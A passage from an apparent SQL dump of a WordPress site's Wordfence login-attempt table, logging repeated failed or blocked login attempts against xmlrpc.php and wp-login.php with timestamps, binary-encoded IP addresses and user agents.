Firefox/62.0','loginFailValidUsername',NULL,NULL),(5490,0.000000,1628928198.329603,'\0\0\0\0\0\0\0\0\0\0��B��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5491,0.000000,1628928526.046418,'\0\0\0\0\0\0\0\0\0\0���Dc�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5492,0.000000,1628928647.363246,'\0\0\0\0\0\0\0\0\0\0��3Kȷ',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','loginFailValidUsername',NULL,NULL),(5493,0.000000,1628928827.331662,'\0\0\0\0\0\0\0\0\0\0����Er',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5494,0.000000,1628929170.058672,'\0\0\0\0\0\0\0\0\0\0��E1��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5495,0.000000,1628929502.477250,'\0\0\0\0\0\0\0\0\0\0���b�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5496,0.000000,1628929837.242653,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5497,0.000000,1628929903.707627,'\0\0\0\0\0\0\0\0\0\0����U�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','loginFailValidUsername',NULL,NULL),(5498,0.000000,1628930132.877885,'\0\0\0\0\0\0\0\0\0\0���Ћ�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5499,0.000000,1628930481.841517,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5500,0.000000,1628930825.329302,'\0\0\0\0\0\0\0\0\0\0��Q���',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5501,0.000000,1628931124.749528,'\0\0\0\0\0\0\0\0\0\0��p�H�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5502,0.000000,1628931163.720699,'\0\0\0\0\0\0\0\0\0\0��իо',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','loginFailValidUsername',NULL,NULL),(5503,0.000000,1628931483.467541,'\0\0\0\0\0\0\0\0\0\0����O',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5504,0.000000,1628931818.162654,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5505,0.000000,1628932147.035216,'\0\0\0\0\0\0\0\0\0\0���3�:',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5506,0.000000,1628932432.858546,'\0\0\0\0\0\0\0\0\0\0����l',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','loginFailValidUsername',NULL,NULL),(5507,0.000000,1628932450.953785,'\0\0\0\0\0\0\0\0\0\0����D',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5508,0.000000,1628932780.148997,'\0\0\0\0\0\0\0\0\0\0��n��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5509,0.000000,1628933115.489083,'\0\0\0\0\0\0\0\0\0\0��zt�J',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5510,0.000000,1628933444.215625,'\0\0\0\0\0\0\0\0\0\0��gZ�(',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5511,0.000000,1628933686.737088,'\0\0\0\0\0\0\0\0\0\0��_��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','loginFailValidUsername',NULL,NULL),(5512,0.000000,1628933811.105005,'\0\0\0\0\0\0\0\0\0\0��3Dp^',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5513,0.000000,1628934110.790256,'\0\0\0\0\0\0\0\0\0\0��gzj�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5514,0.000000,1628934437.081226,'\0\0\0\0\0\0\0\0\0\0��k�*�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5515,0.000000,1628934796.016439,'\0\0\0\0\0\0\0\0\0\0���;�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5516,0.000000,1628934942.324652,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5517,0.000000,1628935122.717190,'\0\0\0\0\0\0\0\0\0\0��H�*-',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5518,0.000000,1628935442.716499,'\0\0\0\0\0\0\0\0\0\0���w',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5519,0.000000,1628935793.533795,'\0\0\0\0\0\0\0\0\0\0���ֻ�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5520,0.000000,1628936108.492534,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5521,0.000000,1628936207.506558,'\0\0\0\0\0\0\0\0\0\0��vE��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','loginFailValidUsername',NULL,NULL),(5522,0.000000,1628936432.822196,'\0\0\0\0\0\0\0\0\0\0���6x]',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5523,0.000000,1628936766.478795,'\0\0\0\0\0\0\0\0\0\0��ár�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5524,0.000000,1628937129.654624,'\0\0\0\0\0\0\0\0\0\0���R-',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5525,0.000000,1628937457.515892,'\0\0\0\0\0\0\0\0\0\0��D���',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5526,0.000000,1628937779.543858,'\0\0\0\0\0\0\0\0\0\0���w',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5527,0.000000,1628938098.027252,'\0\0\0\0\0\0\0\0\0\0���\0�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5528,0.000000,1628938459.187986,'\0\0\0\0\0\0\0\0\0\0��ٓ�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5529,0.000000,1628938743.538172,'\0\0\0\0\0\0\0\0\0\0��C��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','loginFailValidUsername',NULL,NULL),(5530,0.000000,1628938765.707369,'\0\0\0\0\0\0\0\0\0\0���kS�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5531,0.000000,1628939469.613797,'\0\0\0\0\0\0\0\0\0\0��k��',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5532,0.000000,1628940138.482876,'\0\0\0\0\0\0\0\0\0\0�����F',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5533,0.000000,1628940462.514600,'\0\0\0\0\0\0\0\0\0\0����9�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5534,0.000000,1628940668.013065,'\0\0\0\0\0\0\0\0\0\0���Y0',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5535,0.000000,1628940952.979662,'\0\0\0\0\0\0\0\0\0\0��>��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5536,0.000000,1628941551.937661,'\0\0\0\0\0\0\0\0\0\0��Kw�d',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5537,0.000000,1628941929.690988,'\0\0\0\0\0\0\0\0\0\0���B��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5538,0.000000,1628942117.973498,'\0\0\0\0\0\0\0\0\0\0��3�T�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5539,0.000000,1628943210.266266,'\0\0\0\0\0\0\0\0\0\0����Qz',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5540,0.000000,1628944487.491152,'\0\0\0\0\0\0\0\0\0\0��νY�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5541,0.000000,1628945757.441958,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5542,0.000000,1628947050.449558,'\0\0\0\0\0\0\0\0\0\0��_��[',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5543,0.000000,1628948370.211680,'\0\0\0\0\0\0\0\0\0\0��:��^',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5544,0.000000,1628949708.304219,'\0\0\0\0\0\0\0\0\0\0��]qo6',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5545,0.000000,1628950654.321500,'\0\0\0\0\0\0\0\0\0\0��E1��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5546,0.000000,1628951053.969087,'\0\0\0\0\0\0\0\0\0\0��:��^',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5547,0.000000,1628952986.257610,'\0\0\0\0\0\0\0\0\0\0���q�t',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5548,0.000000,1628953719.152182,'\0\0\0\0\0\0\0\0\0\0���Y0',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','loginFailValidUsername',NULL,NULL),(5549,0.000000,1628954946.920427,'\0\0\0\0\0\0\0\0\0\0���5#',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5550,0.000000,1628956356.311067,'\0\0\0\0\0\0\0\0\0\0��/���',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','loginFailValidUsername',NULL,NULL),(5551,0.000000,1628956640.657992,'\0\0\0\0\0\0\0\0\0\0��w��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5552,0.000000,1628957633.272619,'\0\0\0\0\0\0\0\0\0\0��`}��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5553,0.000000,1628958434.439909,'\0\0\0\0\0\0\0\0\0\0�����8',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5554,0.000000,1628958915.531671,'\0\0\0\0\0\0\0\0\0\0����%+',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','loginFailValidUsername',NULL,NULL),(5555,0.000000,1628960201.171947,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5556,0.000000,1628960209.045392,'\0\0\0\0\0\0\0\0\0\0��h�-!',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5557,0.000000,1628961494.743149,'\0\0\0\0\0\0\0\0\0\0���~߱',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5558,0.000000,1628962038.435309,'\0\0\0\0\0\0\0\0\0\0���옔',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5559,0.000000,1628962811.876659,'\0\0\0\0\0\0\0\0\0\0���=�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5560,0.000000,1628963883.167766,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5561,0.000000,1628964154.276524,'\0\0\0\0\0\0\0\0\0\0���wң',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5562,0.000000,1628965477.515891,'\0\0\0\0\0\0\0\0\0\0��t��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','loginFailValidUsername',NULL,NULL),(5563,0.000000,1628965758.951254,'\0\0\0\0\0\0\0\0\0\0��%���',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5564,0.000000,1628967586.102801,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5565,0.000000,1628968082.511544,'\0\0\0\0\0\0\0\0\0\0���A��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5566,0.000000,1628969372.610358,'\0\0\0\0\0\0\0\0\0\0����m',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5567,0.000000,1628969419.170353,'\0\0\0\0\0\0\0\0\0\0��.ec',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5568,0.000000,1628970651.427695,'\0\0\0\0\0\0\0\0\0\0��-(��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5569,0.000000,1628971388.940089,'\0\0\0\0\0\0\0\0\0\0���@w}',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5570,0.000000,1628973225.110205,'\0\0\0\0\0\0\0\0\0\0���Ļ�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5571,0.000000,1628973256.486745,'\0\0\0\0\0\0\0\0\0\0����R%',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5572,0.000000,1628974514.892918,'\0\0\0\0\0\0\0\0\0\0���^�M',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','loginFailValidUsername',NULL,NULL),(5573,0.000000,1628975311.282060,'\0\0\0\0\0\0\0\0\0\0��g�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5574,0.000000,1628975803.433071,'\0\0\0\0\0\0\0\0\0\0��]���',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5575,0.000000,1628977092.850118,'\0\0\0\0\0\0\0\0\0\0���D�\0',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','loginFailValidUsername',NULL,NULL),(5576,0.000000,1628977197.945609,'\0\0\0\0\0\0\0\0\0\0����7�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5577,0.000000,1628979302.381887,'\0\0\0\0\0\0\0\0\0\0��g�3�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5578,0.000000,1628981293.699580,'\0\0\0\0\0\0\0\0\0\0�����-',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(5579,0.000000,1628982240.815635,'\0\0\0\0\0\0\0\0\0\0��vE��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','loginFailValidUsername',NULL,NULL),(5580,0.000000,1628983454.758111,'\0\0\0\0\0\0\0\0\0\0���֖]',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5581,0.000000,1628985499.031239,'\0\0\0\0\0\0\0\0\0\0��ca�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(5582,0.000000,1628986109.946123,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','loginFailValidUsername',NULL,NULL),(5583,0.000000,1628987628.811004,'\0\0\0\0\0\0\0\0\0\0��]�{�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security 